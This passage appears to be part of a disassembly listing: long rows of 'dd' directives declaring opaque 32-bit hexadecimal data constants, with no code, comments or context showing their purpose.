		dd 0B20F2453h, 4FDAC4EAh, 688290B5h, 94DBF770h,	38940BD8h
		dd 0A3350BFEh, 2D425FCBh, 0CFA3B1DAh, 0D0D4CA08h, 78929D36h
		dd 2E096D06h, 0D160DAC9h, 6F5E28D0h, 399A45B2h,	3B4425h
		dd 0E3684C7Eh, 331719D2h
		dd 37F7BDC6h, 3375CC2Bh, 8B9625C6h, 81EA8F2Ah, 0D9AF4A33h
		dd 461BD36Eh, 0ADBEA292h, 8930C4D1h, 8B74AFB5h,	6AB961Dh
		dd 0E8404B81h, 3C3E154h, 14ADFAA2h, 0E52597E7h,	5FD64108h
		dd 0AD4968D8h, 0EA8BB4Ah, 0AE6ED67Dh, 0E175E2DEh, 85AD2E80h
		dd 33E7A9BCh, 71403A6Fh, 5C9DF07Ch, 357B5D9Ch, 0D18AD82h
		dd 0ECF34516h, 82CECB81h, 13AB5F89h, 16ED1DA0h,	0D1907F5Eh
		dd 76D0E472h, 5B1FE228h, 5134B83h, 0AF703D54h, 0BE8D075Ah
		dd 0E2A9ED10h, 69750BBEh, 11D85F98h, 64B005F8h,	0AA984D71h
		dd 4581022Ah, 0B61C35A3h, 7DCF2CCh, 0E8CE9D57h,	417DDDA9h
		dd 0EAAB38B3h, 0A91555BAh, 40B40396h, 3D0B3FE5h, 0ED7659A9h
		dd 751563ACh, 185EBAEAh, 0CBAC3BCAh, 19F9F01Ah,	0BE4327B0h
		dd 5A3E4212h, 0D7E7E8A3h, 4BE2BDC1h, 307BC36Ah,	494F6A5Ah
		dd 0C2BABE26h, 0E8B64B69h, 0B474D997h, 3C0B31D9h, 88462996h
		dd 0A3D1CE21h, 0F1240EF6h, 0E80BE4C3h, 7884E94Ah, 0CAF9C9E9h
		dd 2CE75D26h, 97EB871h,	383AE58Dh, 2DC0ABC7h, 2DE269C4h
		dd 9504096h, 9BAEDB59h,	302BF0D6h, 0E4EDE531h, 7DC0442Bh
		dd 7CC77A97h, 0B84D4452h, 26EA25B8h, 5A2949D3h,	6D26558Ch
		dd 0B9EDAF8Dh, 0AC61D137h, 45DBFC2Dh, 4EF063B1h, 7911F5BDh
		dd 0CB02F370h, 3C43C50Bh, 0C02BF8C6h, 258E68F5h, 0CE93E6FCh
		dd 49779B8Ch, 0C6C28ADFh, 1E5129Eh, 578DB0A3h, 4BEDBCC9h
		dd 30C4FBEh, 6F449C9Ch,	407339B2h, 7E6D9094h, 9373F12h
		dd 5AD1CFF2h, 0A8A1AE8Dh, 0E576DD37h, 8B17AA9Dh, 0B2B1FBF2h
		dd 0D382F774h, 0D9B58535h, 6115089Fh, 40973A2Bh, 377EE9EBh
		dd 3FDC3CDAh, 0C149942Ch, 0C1C4D014h, 1EBFA55Bh, 6CABF978h
		dd 1E61A13h, 0DAD281AFh, 5AE4F4A3h, 77058C4Ah, 0D5458113h
		dd 1570C7F2h, 92B012ACh, 3F641F7Bh, 6D686889h, 0F0DFB73Fh
		dd 4852F8C9h, 86A325A6h, 18A78036h, 5E92E405h, 18B986D1h
		dd 0E1E3F42Ch, 7EBC5056h, 0FDB0B5F5h, 93844770h, 84BDA543h
		dd 0F87E816h, 39CC930Ch, 0BE7231C4h, 99970D8Fh,	2F06385h
		dd 0E5A8108Eh, 15067D71h, 3E4E287Eh, 0CCBF933Fh, 0FA5C6DE3h
		dd 0C58926E5h, 3D89E065h, 0A554F0F0h, 79565C7h,	3C7049Dh
		dd 0B87A6B7Bh, 4C04FD43h, 18FF97F0h, 4CDA9835h,	1B7C4B36h
		dd 0A19AD6B7h, 0CFF5BC32h, 84C3EDA0h, 2D994A96h, 89989408h
		dd 7471F469h, 56F49F59h, 8405B935h, 37514EDEh, 0A33B7C8Fh
		dd 4517BFA5h, 0B2F767CBh, 7F09CF2Eh, 0D77991BFh, 0B46DABDh
		dd 0B5D2AC35h, 2E85F22Bh, 0C6A5B93Bh, 6BC8112Ah, 54B1A913h
		dd 0DAD5721Ah, 7D92A5BDh, 90C1A3C1h, 5821415Fh,	4C4CACC1h
		dd 6C5C9014h, 52206C05h, 0C651A4B5h, 0D52754A1h, 17B7BEFDh
		dd 0A96CCFB6h, 931D4081h, 37747B32h, 0D7C1197Fh, 0D14B45Eh
		dd 0E61CE341h, 1BD8C75h, 0DB7CF7D9h, 0B35A5337h, 0F6DCB067h
		dd 6A1077CBh, 0A0A4C38h, 9A2816CFh, 859704D9h, 0A38088EDh
		dd 0A211FD07h, 5C2FADF9h, 12104CD2h, 8FAE954Dh,	6ECC3E44h
		dd 0DA5507BCh, 0C5D03F13h, 0DCC5C816h, 121C55E4h, 0AAD272ADh
		dd 0AF464681h, 3BD9CD97h, 5664D44Ch, 0EC21FB6Fh, 0AFE70731h
		dd 0BAD3CE56h, 7C4AD488h, 5F6633B3h, 0DA31E977h, 7377E4A8h
		dd 0BB14E6B9h, 10937140h, 5EA595F7h, 1862582Fh,	0F0FC3B88h
		dd 0B414F823h, 47276F2Fh, 8A7E152Bh, 0FC5938F1h, 0E8427290h
		dd 0CA545A72h, 59B590BCh, 5B1CF13h, 0B309A2EBh,	492A6E9Dh
		dd 0C89EDF73h, 0CBFA2FC8h, 5FEDE656h, 2AB7313Bh, 0F9517812h
		dd 3D32CC96h, 0A2ACD881h, 0AB509E39h, 0ACBF8B70h, 3EA1B82Bh
		dd 21200464h, 0B6AB41A1h, 2A46BEF2h, 8EEE9111h,	2DA96A1Fh
		dd 0DAB4D35Bh, 95B65E48h, 0DF207D04h, 4FD9E93Eh, 871BFB4Dh
		dd 9148F7C7h, 8B3FE0B4h, 0FD38FDA1h, 0BE9CF9BFh, 0D76AF42Ah
		dd 0EA34A072h, 0A4F6D133h, 0DE591C19h, 75DC63B8h, 16CDB99Bh
		dd 14C6954Dh, 758BB24Fh, 0CE3D7F7Ch, 40FD5A6Bh,	0BE0DE384h
		dd 0FC3F046Ch, 5D31891Ah, 0D31F093Ah, 0C9271A93h, 56F8374h
		dd 0A7CBAD7Fh, 966887B0h, 64F44A07h, 3F478E92h,	78D8747Eh
		dd 0A532A82Ah, 94C7C34Bh, 0A3F55A39h, 77043AD2h, 76E4C4E0h
		dd 97EC5FC1h, 0A8CF7DDFh, 0B7DA7D91h, 0C3FA3F29h, 4A26B390h
		dd 0E31DE56Ah, 28561370h, 9189059Ch, 8DD64ACCh,	93A85864h
		dd 40627F60h, 208E840Ch, 9B6FD185h, 0FCCA4D6Ah,	99F01B09h
		dd 0A520933Dh, 85F09C70h, 87C3EFh, 0C6C17C25h, 31ACB9B9h
		dd 97D36435h, 2A2AB478h, 0E796A1A0h, 1105D569h,	73EEEEA5h
		dd 2D45D767h, 6D25C2B7h, 83ACB3D3h, 68D541D0h, 6BAD8771h
		dd 28566A6Fh, 77971B48h, 9E4A79F3h, 0F6648F74h,	5CBF8DFEh
		dd 5A5D21F8h, 0BE0869A5h, 5238D15Dh, 5097404h, 11FA4091h
		dd 74550E55h, 1D83DD20h, 91F71F8Fh, 8EA6313Bh, 5272F396h
		dd 0EB149B57h, 7949EE98h, 8667BB2Dh, 0D404129Dh, 9D0F7701h
		dd 6C628E9Eh, 0EA6FC7EFh, 0B6D2F14h, 0AA8DE1B2h, 682379C3h
		dd 0A17F81F1h, 8452997Bh, 1F7C5696h, 2C5FF606h,	0AF689EABh
		dd 981385C1h, 8DC26D78h, 0AC53DCB5h, 0BF17BA6Fh, 180F2495h
		dd 0AF461135h, 0F0CA8E66h, 3BCBD217h, 0D6A12690h, 0A87846A5h
		dd 9C458BE2h, 4DE8A36h,	0AACBF83Eh, 1B4D6685h, 0F5DF1F35h
		dd 44D94E89h, 289A0960h, 0E2D5E120h, 8B0BEB76h,	575825F2h
		dd 0D6D4E1Dh, 3E7C5C5h,	0B435C62Bh, 9604C851h, 0E38F72EEh
		dd 0C78B9944h, 37531FCAh, 0BA473F55h, 0AC39960Fh, 6F50D276h
		dd 0A305DF7Bh, 18D39E4Dh, 7832D37Dh, 0C5F32F26h, 0AAEA25CDh
		dd 2607EBF5h, 0E662AE13h, 0E83EF3D0h, 12AF5524h, 9D9D4DAEh
		dd 9701AD05h, 348D8ACh,	57FE074h, 3F8CF6BCh, 10E55C25h
		dd 0B8D78725h, 0F9218BD1h, 0E338E634h, 0ECEF85B1h, 7FCE733Fh
		dd 4B888296h, 0A52FD5E6h, 9ED0884Bh, 7386E1BDh,	5E707A5Bh
		dd 557AD2B4h, 76AB976Bh, 0AF184735h, 94A04E36h,	3CFC7DDCh
		dd 9F478AA3h, 34B2999Eh, 0E1DCFA57h, 0CAA9ECC3h, 0DC32E4B7h
		dd 329BDED7h, 0B3948026h, 35196314h, 0D8BFE6E1h, 0E4FCCF16h
		dd 1D5EDFB9h, 29CEE32Dh, 7F7B8BDCh, 67B88E60h, 0EC8BC9ECh
		dd 0D23705BBh, 0AE38A4F4h, 98872702h, 99C35C5Dh, 79B7E9ADh
		dd 30589F80h, 72455871h, 53AFC2E5h, 884E4B51h, 264BB537h
		dd 24A02E60h, 9AA96378h, 425F4A50h, 8E6EEFCAh, 0F1D93CCh
		dd 22082D6Bh, 767C89DEh, 4C56E18Bh, 5F37AAA1h, 0EF178909h
		dd 75282CCDh, 53B815F0h, 89D6E7Bh, 68C58A59h, 31B756ADh
		dd 64DF4E2Fh, 0FBAEB78Bh, 0BA6DABE3h, 1D9AE214h, 0D2B45C18h
		dd 7BFC7BB3h, 0B120417Bh, 18B8E1AFh, 0B025BE06h, 136A1FDFh
		dd 0A2333C1Fh, 7AA39BECh, 0F3DAE102h, 0D11900ABh, 0F78707Dh
		dd 0D9F78h, 1FF51045h, 8FCED59Ch, 0B2D12151h, 68A76AC3h
		dd 15D83BC6h, 3F35A730h, 54A36816h, 75AF1071h, 2C6591Bh
		dd 16120DE0h, 7930614h,	0A1AF3EC7h, 0CDA20E7Eh,	8363B91Ah
		dd 0BD9C1FDAh, 7E8A00B6h, 851A81D1h, 69B3E8D6h,	0E5EEB6EDh
		dd 99F0B68Ch, 8896B187h, 5FB4646Bh, 4F6402DDh, 0D4FC5320h
		dd 50C8253Ah, 0AA29D445h, 0E845277Bh, 2B4571A3h, 0E4576A15h
		dd 0E633538Fh, 0C3C6972Bh, 0D91C03C8h, 80FFBC73h, 9DA317D1h
		dd 0F65C5B08h, 991FDC25h, 2C5C0F03h, 0B0FCCB2Eh, 0DBCAFFCAh
		dd 0F1BA6A25h, 0BDAA5CBDh, 2DBCC256h, 0B8B9E034h, 6BB6D8A3h
		dd 3C715CB8h, 0A276B357h
		dd 2894122Bh, 292E4A3Ch, 46786FD2h, 0A96580A8h,	6BD92D7Fh
		dd 0E0CD2020h, 4CBCC10Dh, 0A7424166h, 10DA3152h, 0D1894D03h
		dd 38D40E29h, 6E1141Eh,	8B90F46Dh, 0BF04572h, 29EEC9CDh
		dd 3172FF54h, 6D0F480Ch, 132788DEh, 425BFCABh, 0BF6395B6h
		dd 0CDA27518h, 7D43B83Eh, 0B51193DEh, 104713E0h, 0B0A85D84h
		dd 0EA9666BEh, 21229C6Bh, 8AAB96E6h, 0AB2B81CEh, 4D328453h
		dd 8E85C14Bh, 0FB457311h, 0BA820177h, 0BA814151h, 0C671A14Eh
		dd 0FE2EFC7Ch, 57974040h, 0FD65E741h, 6E9E62D2h, 0D6170C14h
		dd 0A33AA8DFh, 7AF6D555h, 0FAABA88Dh, 607D85FCh, 9616D1E0h
		dd 0E04A1E5Dh, 87C0985Fh, 1490736Bh, 9A9DF8ABh,	0F1A12D65h
		dd 0DE575EE0h, 0A15D0F6Fh, 0D4A15B85h, 0A2BE3314h, 0ECA8A861h
		dd 55A23B2Bh, 77D1D44Fh, 0B275052h, 0C42F7D8Eh,	71A487C7h
		dd 0A1ADF9FCh, 0CD525077h, 0F2A549CEh, 5678ABCDh, 1AEF85E8h
		dd 9A123E08h, 0D6925E10h, 1F13DBD5h, 28FCD246h,	92D557FAh
		dd 7ED895E8h, 0E484F78Bh, 2253E7F6h, 0C0F1CD75h, 5FBCF757h
		dd 1268EB7Ch, 86896D5Fh, 0E07CC756h, 0CC7A9B9Ch, 9DBADBFFh
		dd 6945625Fh, 2ADAADDFh, 0A39FFFC5h, 3ED937BEh,	1A5E86C1h
		dd 73407518h, 1595BDBFh, 38A25AB3h, 0C0F1F555h,	0A34D5C52h
		dd 1FC646A1h, 6B90B1B8h, 0C6807651h, 4FA2816Dh,	0E5FD73C3h
		dd 47E27231h, 0A8DAFA3Fh, 0BE132379h, 53B73CD3h, 5CDAEC35h
		dd 0EE8E0E66h, 2DBD2861h, 866062FBh, 74412F4Eh,	84C9BFC7h
		dd 5FDDC23Dh, 0A340F2FFh, 0C4355AEDh, 0E1B845E5h, 0D8B44687h
		dd 0BA285050h, 0D0BB53FDh, 0FA4172F2h, 6DEB4E5Ch, 4DF0FA8Fh
		dd 0E7A3B49Fh, 0E9D43DE8h, 0CA7985F5h, 0DBF8EE25h, 0F19DEC5Eh
		dd 0C88D5243h, 778E25D3h, 813EABD3h, 8996096Ah,	0D57A53D6h
		dd 2DA96A75h, 0CBA1A287h, 1DA542A0h, 0C09BB8B2h, 0C656A2A5h
		dd 1FCE00AFh, 66DD812Eh, 0A81B66AAh, 87D64FD9h,	0BF45F585h
		dd 63386077h, 9A7448B2h, 46A29A4Dh, 0D6EE3759h,	49E03545h
		dd 142A9Dh, 0BFCF042Bh,	0CD51FFA4h, 3768BF02h, 0BF41CD2Dh
		dd 6F36A5B8h, 989EB915h, 47E4FD1Eh, 31AA12CEh, 5A591569h
		dd 5FC2C3BCh, 264A0D4Dh, 586B78C6h, 79A4AAC1h, 7FBC5EA0h
		dd 1F3DB1A2h, 0D765D5C8h, 2931D30Ah, 4D57561Eh,	0B4D2685Eh
		dd 0A0A102D4h, 0A811DE23h, 6B1B49BBh, 0F26844E1h, 0E5E60538h
		dd 9B637E2Bh, 5FB15F6Dh, 0F386BB9Ah, 0FE4A306Ah, 907DD475h
		dd 0A38DB89Bh, 4397D7ABh, 34425F75h, 768A3FBAh,	0B15DE4BFh
		dd 0C229FD57h, 4E8F5766h, 0A3990FC1h, 0F4FD880Fh, 2CE25426h
		dd 5C0916B2h, 523278ACh, 0CC49BA64h, 0E07D78D2h, 0F6237E99h
		dd 0E55858BAh, 0ED6FB05Fh, 2BD0B77Ah, 0D1EAB3AAh, 0EE39F55Ah
		dd 2E0FEA2Ch, 0F7E8A49Ch, 3F3D2A37h, 9F87E770h,	0CB7B0572h
		dd 44932FCBh, 0A2BB8D54h, 0C8F8EDF0h, 71628F35h, 8BAA44F1h
		dd 68FE439Fh, 130AD409h, 41F1EE68h, 0D82CD09Ah,	0AAED948Bh
		dd 0F904F777h, 801BBE8Ah, 1E89F03h, 1C740B0h, 24F187Bh
		dd 6D83AAE1h, 135C657Fh, 60AAB42h, 3BE4C483h, 0BB9B3408h
		dd 0A993B5Dh, 0F3328D8Fh, 0C8520278h, 50F788DCh, 0F812F0AAh
		dd 0DA80C1F9h, 0DEC7C847h, 89FE5F00h, 2A36C35Ch, 62D58D48h
		dd 80D8F94h, 1DA40D5Dh,	92498E7Bh, 0D57B2FC1h, 17006F05h
		dd 752AF129h, 1DC7DBCBh, 5E52168Ch, 0F57E8B73h,	162831D4h
		dd 0F25FDD3Dh, 0AA1F5FBAh, 0EEDDF1FDh, 4A5BDD87h, 6BF27667h
		dd 7058FC13h, 35382725h, 7E0A24F4h, 0F02E3E8Eh,	0F3B88109h
		dd 8D5353A4h, 0E173AEC8h, 0E4FBD057h, 709CD74Bh, 0E7CDFD78h
		dd 9BB85AC4h, 373F799Dh, 951DCE5Ah, 7C56FD9h, 4D61A81Eh
		dd 4CA805CDh, 31A2A0ABh, 0A15EB64Dh, 0DDD99568h, 0BAEB5368h
		dd 5325D4A9h, 0E04D01A5h, 0F95933E2h, 0AE8EBFEh, 0ED702D77h
		dd 0B1766759h, 735FFC05h, 71B44B21h, 24A460BBh,	0DD5C7F6Bh
		dd 928272FFh, 0BF47A08Ah, 972360EFh, 5228F816h,	0B5905CD7h
		dd 6684EFDAh, 773535DAh, 82B6647Ah, 89F15C54h, 617203C7h
		dd 216D81E6h, 0A47BE0F0h, 0D1C1C04Ah, 5BB5AFABh, 10C438FFh
		dd 17082252h, 227DC637h, 8F84BBA6h, 0BFD472D6h,	0EF59C40Ah
		dd 0BF12DF62h, 0C4176541h, 0A47F8B0Fh, 0EAEBEB3Dh, 73A17BB8h
		dd 6ED6B36Dh, 7BB4E2FAh, 98CF13AAh, 0FDAD65E2h,	0E883E9D3h
		dd 4A031459h, 976FEFFCh, 0E3C39EBDh, 0A9D939C1h, 0D5E88D14h
		dd 86263D3h, 39894416h,	0F067EA41h, 0EC96E128h,	7301B93Ch
		dd 0D1AC07B0h, 1ABE6D7Ch, 6966D61Eh, 82127091h,	0A1754BC9h
		dd 58B98B54h, 0BF5209E5h, 606814EBh, 1EDEB5F4h,	9D3DB343h
		dd 0A1268453h, 7F58E0F1h, 7F368BD5h, 1B2ABD9h, 672F9AC3h
		dd 0DBADA82Eh, 9AF2D41Ch, 11323493h, 9D458AC5h,	12278EFh
		dd 74C6CF85h, 0FAB4EC3Dh, 6D3E06DBh, 0D9B97B20h, 6872DCCCh
		dd 450E7D4Fh, 2D65BE84h, 155D312Fh, 0C9B532E7h,	0FCB411DBh
		dd 1D6D57E0h, 13CED2EDh, 2DFD39AAh, 0EDC8C3F6h,	0DAFB3D81h
		dd 0F155F1B4h, 0DDB8C936h, 0D7F9319Ah, 5861E04Bh, 0FF99FC97h
		dd 0BC7915B2h, 0B6735ECAh, 0B16EE04Bh, 0F87A975Ah, 32503AC5h
		dd 0E2845B06h, 0AE95ABCAh, 710D847Ah, 52B9315Ch, 3B9AE231h
		dd 0B16EB3AFh, 44CC4DB4h, 0A77B2B7Dh, 4A744E41h, 2B2FEA77h
		dd 0D6B7C0FFh, 0FA3DD6Dh, 0E0789C7h, 0AECF63E3h, 9EF3EF0Dh
		dd 0B754D512h, 88F85CF8h, 2BCAAE09h, 97C810CDh,	57328614h
		dd 0F36DF442h, 0C5F41535h, 168F4025h, 8FDA4E54h, 15CDB826h
		dd 0EB052C54h, 67A044F1h, 5A176B0h, 2328EB12h, 0AF48AFB8h
		dd 0E35D9928h, 0F071F960h, 52B6D243h, 0C3B035E9h, 4DE511C1h
		dd 336D7736h, 28EDE269h, 0F4EAB217h, 0C689E510h, 4AFF6E4Eh
		dd 3EC9EED0h, 0C6D6168Dh, 0D8C643E6h, 3001DECCh, 9EE32E0Bh
		dd 60E6D55Ah, 681E6E5Ah, 0AE5BC757h, 0D47FAD5Bh, 0DCE0978Dh
		dd 2B712807h, 8E06A1F8h, 27DC79Eh, 2BDC74C6h, 87108B0Ah
		dd 0B960F575h, 0DBE53D64h, 0D2C178C4h, 0C35BA83Bh, 3DACBE54h
		dd 0DD694B7Ah, 0B359788Ah, 0FC37B653h, 0F85C0412h, 28FA53F2h
		dd 1F7A8577h, 379D301Ch, 8F74FE0Ch, 2DBC759Dh, 92825FA9h
		dd 2CF503ACh, 5F932F15h, 0CBFE171Eh, 31DCA499h,	1CE925F8h
		dd 2CBC1F5Ah, 0C30078D3h, 0B1C0C781h, 0E6C4C55Eh, 0F35D459Eh
		dd 36F28711h, 46FBAC2Dh, 7450289h, 0BF7507A7h, 0BDC28DE1h
		dd 6676D478h, 0D53778D4h, 262D1B2h, 1096BE61h, 0BEE92079h
		dd 0D7605619h, 446A6AFAh, 0DE8A55C5h, 0AFE0F68Fh, 0ACBF1F92h
		dd 0C5DB7CF2h, 73A2A695h, 645A5C29h, 0C6FA2B27h, 8E4090D8h
		dd 11879FEFh, 11D0DACCh, 0A36E68BAh, 0AA55B478h, 7238CCDh
		dd 37EEA3A9h, 959C71E4h, 255BD93Dh, 0DB1D0F02h,	8286ACBFh
		dd 893312CEh, 4EA943C2h, 0D68F3B43h, 0A8CAF702h, 84A01350h
		dd 0CDEB2DC4h, 0D18697B5h, 58EA38EEh, 0CD166AFFh, 3E19BBD4h
		dd 8D74C1DAh, 1FC94B15h, 0EFC0283Ch, 0DC8B4CB7h, 7C2A7747h
		dd 0D4A35DE0h, 0F140D542h, 8EAF926Fh, 0F4288383h, 0D6753411h
		dd 0B1991DF8h, 48563216h, 67582E0Dh, 13DAAF2Dh,	0FC3A0C87h
		dd 9E4D46CBh, 995E34CFh, 70854094h, 5F67B67Fh, 2283C8C6h
		dd 49BF2669h, 0F831D50h, 0E55E92FCh, 3584B925h,	523802A2h
		dd 95DA9599h, 0F196C1D3h, 38CE56DDh, 0A7799843h, 5D941BB6h
		dd 539F34A0h, 15682603h, 0C96843D2h, 0AF13E3C7h, 1C9A9FC4h
		dd 795115DAh, 50BB7E7Eh
		dd 213AECC9h, 19601BD4h, 956B1B65h, 0BBDF733Bh,	921C66AEh
		dd 0E80A35F3h, 0C969DB69h, 6015E979h, 15B1092Eh, 94AE629Fh
		dd 0F46F0C49h, 7A37F527h, 0AC894C77h, 6DCC972h,	0C9463589h
		dd 0BFC1C270h, 9BA97690h, 0B9E9EFCDh, 53B546D1h, 0E50E7B20h
		dd 0D5FF3DF0h, 93D1DB63h, 27C95832h, 780A72E5h,	0C959DC0Bh
		dd 1776D02Ch, 0ED8CE638h, 0BD53FC72h, 853B04D8h, 6B730C61h
		dd 0F1FCFD0Ah, 2A081DF9h, 9C4DF6Ah, 0D4BF08D6h,	1D903F0Fh
		dd 50752DB6h, 0B93B53F5h, 19C09DC3h, 88ECAE0Dh,	0A174A21Fh
		dd 53DEEC41h, 0D5BBB09Fh, 0DFC33361h, 0CA171A97h, 8ABEBB7Ch
		dd 40A19979h, 5DA849DFh, 1337BAEFh, 0C31E5165h,	0A328E4h
		dd 2FB19C21h, 0E5DA6CEFh, 0FD45F16Ah, 85282DA5h, 87A5AC79h
		dd 37300E17h, 269A7C28h, 45F718F6h, 0A718B7D2h,	0D15E13CBh
		dd 0E06BA546h, 6E3C053h, 2257A4A5h, 17F98545h, 0D5558E92h
		dd 4AE7467Dh, 4D005420h, 0BBA514F7h, 0E501B1E6h, 0D6841DAFh
		dd 0D2974D95h, 0AB47A431h, 2BD5881h, 999C7EB3h,	5C88BF57h
		dd 0D879F79Dh, 7E4DB0B8h, 0A95DDD8Bh, 77811401h, 9A631CF5h
		dd 0A45D6E1Dh, 0A26ADB58h, 3E92CB3Ch, 0BA5FE1EAh, 0EBC016E7h
		dd 1E7A6D3Dh, 0EE9F08BAh, 7A5AE10Dh, 2FB5816Dh,	0C6A6B021h
		dd 0DB8C283Eh, 0DD0A64F1h, 5179A373h, 50F455F6h, 33B65248h
		dd 5DD98A48h, 0D6918BF7h, 0FC82B924h, 0F13B1089h, 0F04E5338h
		dd 0B255617Ah, 0CCD7AA32h, 1282F094h, 921A4054h, 0FBF03D15h
		dd 0D87A918Ah, 477DFFB4h, 0DF85FDD1h, 4532E35Dh, 0BF4BDA2Bh
		dd 1033FB9Fh, 0A71A17EEh, 0BE29F6CCh, 0BBBB54B8h, 3422F07Ah
		dd 0CA951A2Eh, 318B6E34h, 0C7C3A323h, 93FC501Dh, 0F4AF1113h
		dd 8957C454h, 0D2B1EFC1h, 0EE6CEEEh, 99F8E9ADh,	4272CCA3h
		dd 1CD37515h, 94B52B2Dh, 9AE5B665h, 0F134DA23h,	6894B552h
		dd 0AA2E754Ah, 144E6B38h, 7BA0B2ADh, 433B494Dh,	63E688F9h
		dd 45F59F24h, 0E84CB15Bh, 2091B0BFh, 89D5E37Eh,	2205E808h
		dd 0A812C2A1h, 20D0CC4Ch, 7A357698h, 0AEC499BEh, 0DD2E0792h
		dd 0E1FD8DD1h, 0B01094F7h, 32AA062Fh, 15064203h, 10EEF8A8h
		dd 0DCF69A27h, 9B9203ACh, 0F2B807C7h, 7596D6EEh, 0DCBEFADh
		dd 946FD2D7h, 155E529Ch, 0CD94F7F7h, 50B55DE5h,	0C14128B0h
		dd 0DD5F6E23h, 0F6980479h, 0E7123981h, 8AF6CC42h, 8AF43E3Bh
		dd 0F253BC14h, 0C310DD7Ah, 0A00C1C85h, 3EC23EAAh, 85D32190h
		dd 87947128h, 832D1318h, 7079922Fh, 0CDD3F1EBh,	3936EFA0h
		dd 8DD1B0BBh, 0A1A842D1h, 0BD5B2F05h, 0F63F9704h, 892507C6h
		dd 0EB766496h, 6549B813h, 8B84454Fh, 19290256h,	40AC05D1h
		dd 0D0D575A0h, 95007697h, 2F69B876h, 7CC1ADFh, 14F2C391h
		dd 9DCEBBDCh, 1D8C968h,	7424847Fh, 0D1D587E3h, 1BF887E2h
		dd 0F3AA9A73h, 0C7D4C67Bh, 5B16FD7Ah, 0AE351526h, 5FA0946Ah
		dd 5B77C289h, 9EC691C1h, 0DEE81852h, 0F220C8ACh, 7C6A2E52h
		dd 672CCDCAh, 86027515h, 8FC12F40h, 303C2EE7h, 7A75E1C1h
		dd 0F081BE8Eh, 1A688550h, 271FB471h, 0B3E002B6h, 940DB9F0h
		dd 0E99460A7h, 4E8BAAEEh, 437360B9h, 116FF1DFh,	62329C25h
		dd 96FB9E51h, 14CBA3AAh, 0E5FE90F1h, 85CF6338h,	0B07B57EEh
		dd 0D1186C26h, 0FBAA954Eh, 4FE9B2EAh, 68A2BD10h, 91A9B3EEh
		dd 6E735BE6h, 0EEC9AEEh, 0DA2EFB2Dh, 0AA70AEDCh, 0E3A58B8h
		dd 9D3FF972h, 7440AB68h, 0E89FCF6Dh, 6C76BE3Bh,	484FC827h
		dd 73FB06C0h, 22434940h, 5A72D576h, 917F0D2Fh, 0C99E9988h
		dd 87075E1Bh, 3528F081h, 0B1EBD11Ch, 0C797FC2Ah, 1DE21DF1h
		dd 69511E6Ch, 0D35178DBh, 1A0DE23Dh, 0D492DF6Dh, 0A9D58152h
		dd 0EECE6828h, 7C19A820h, 86F2EF4Ah, 57E7054Fh,	90A7D5C0h
		dd 5B754953h, 2850CBD7h, 0B0CB383Ch, 0C47668D5h, 0E4EEC2Eh
		dd 3EA2656h, 0F85F2467h, 0DB39D5CCh, 39E637E0h,	0B88C6827h
		dd 46B87C9Dh, 0EF479919h, 296BF83h, 87E39E4Dh, 3776A725h
		dd 5C85AB7Dh, 0C8447A67h, 0DC402BDBh, 681A71D4h, 0F8286DECh
		dd 0F6E86121h, 4AB284C1h, 0DFCB4A8Dh, 0AA47B886h, 0FB52EE26h
		dd 0C5563B81h, 9541F336h, 0ADEFB4h, 3F11A6CAh, 4F1B74B4h
		dd 0A1CCAF55h, 53B0B15Fh, 39DB3621h, 9683A05Ah,	44D5B5C3h
		dd 8686AAB9h, 1B543D02h, 1E257E07h, 0D12F8EB7h,	0F8AA1323h
		dd 339125BAh, 4F882C5h,	0B8AA0C53h, 0A284FAA1h,	9FB39B4Ah
		dd 0E092617Dh, 6D475F68h, 0BF488786h, 0D6496809h, 0DA99D8FAh
		dd 34CB2AA7h, 7FBABD88h, 0FA32A168h, 0F0E69D05h, 0FC95CF53h
		dd 0BB2FF03Eh, 556B1A23h, 0C798F7D3h, 97F58291h, 0BF31EA21h
		dd 2A93DBDDh, 0CEAD5555h, 0B020FDCAh, 0F402FF71h, 0A5BA2B03h
		dd 6D9D0D3Bh, 0A3CBC07Dh, 0FB1FEAB5h, 7CFA34B2h, 6D8299CFh
		dd 9E474388h, 0BBFBB558h, 0DC5E4BF3h, 0A531EE87h, 4DED68FBh
		dd 3EA64B56h, 0E46006A6h, 0AC099B56h, 54057FAEh, 6181B755h
		dd 0CAB4A31Ah, 4815598h, 10EB3D6Eh, 277A3A01h, 0FA434BDFh
		dd 3CD8517Bh, 0DCBF546Bh, 86562BCDh, 2AB6C0F4h,	8EC15171h
		dd 62737736h, 0F05376D7h, 0C7BDD16Dh, 74B0F6CAh, 7C8FFEF5h
		dd 50303C9Fh, 7ADB2BF5h, 774C80FBh, 43858819h, 1F55FB1Dh
		dd 68A8F2CDh, 0F3F5BBEAh, 9174612Ch, 0AF5F47F4h, 4A96172Dh
		dd 413DD243h, 8DA22C94h, 1E2F9329h, 103ACB38h, 90AFF7E8h
		dd 0D1B9AA5Ah, 0B50E3E76h, 371896D1h, 5CD2E414h, 26CF5BE4h
		dd 3A4FFA55h, 9920AAF5h, 0E84675B3h, 0B5608C2Ch, 4172667Eh
		dd 0E9641946h, 0D4420E93h, 0EF2951B7h, 3AF140A1h, 0CCC28A63h
		dd 0C6BE41A7h, 0E6EF8057h, 62639446h, 59FE04E6h, 58264D60h
		dd 4B0A9EDEh, 5B8BD4B5h, 44909DEFh, 9FD122FCh, 6F763EC9h
		dd 1E0B1C6Eh, 74FF2CDh,	6674E54h, 0E1A208E9h, 7B375723h
		dd 62D297E1h, 0DF6E706Ah, 0DD262D21h, 689B3074h, 93579EA7h
		dd 6E33782Bh, 4367168Ch, 7C14391Ah, 0CFB7AC94h,	9D2888A8h
		dd 1B2A552Bh, 55E8BF9Eh, 8D7B27FBh, 4E175114h, 75C55C3Eh
		dd 97CEAB12h, 0C2DA197Dh, 681219B7h, 9CC19A5h, 0C36C7DA9h
		dd 7E2D2AB9h, 5B5D3DFFh, 0C594BFDBh, 77EC966Ah,	0F9D6026h
		dd 95F76479h, 81804713h, 0FBD42EB3h, 92C846CBh,	0D2F8531h
		dd 0B2E1FF39h, 61F1D71Eh, 7C37E888h, 9E22DD47h,	0B8CD373Ch
		dd 0ABC9229h, 0FEDA4E64h, 900B6FDCh, 8DC237BFh,	97399179h
		dd 0E2B51E18h, 2C71074Ah, 5B13BA5Ah, 54ECF537h,	0EB7D9E42h
		dd 9AB9069Fh, 0DB4DF1C9h, 0EB6E2902h, 71DB2DB1h, 62F9D00Ah
		dd 71B6E550h, 35452812h, 6C3246FEh, 8AA1950Ch, 0DA8E1CEFh
		dd 0F785C8DCh, 5361EFCEh, 0CC2EC079h, 0DD8D9784h, 87CC4780h
